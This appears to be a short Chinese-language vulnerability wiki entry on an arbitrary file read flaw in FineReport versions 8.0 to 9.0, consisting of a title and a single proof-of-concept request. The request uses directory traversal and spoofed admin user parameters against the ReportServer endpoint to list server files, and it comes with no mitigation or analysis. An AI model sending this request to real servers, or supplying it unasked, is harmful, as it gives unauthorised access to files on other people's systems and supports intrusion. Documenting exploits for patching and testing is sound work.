FineReport v8.0 – 9.0 任意文件读取漏洞/zh-cn

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true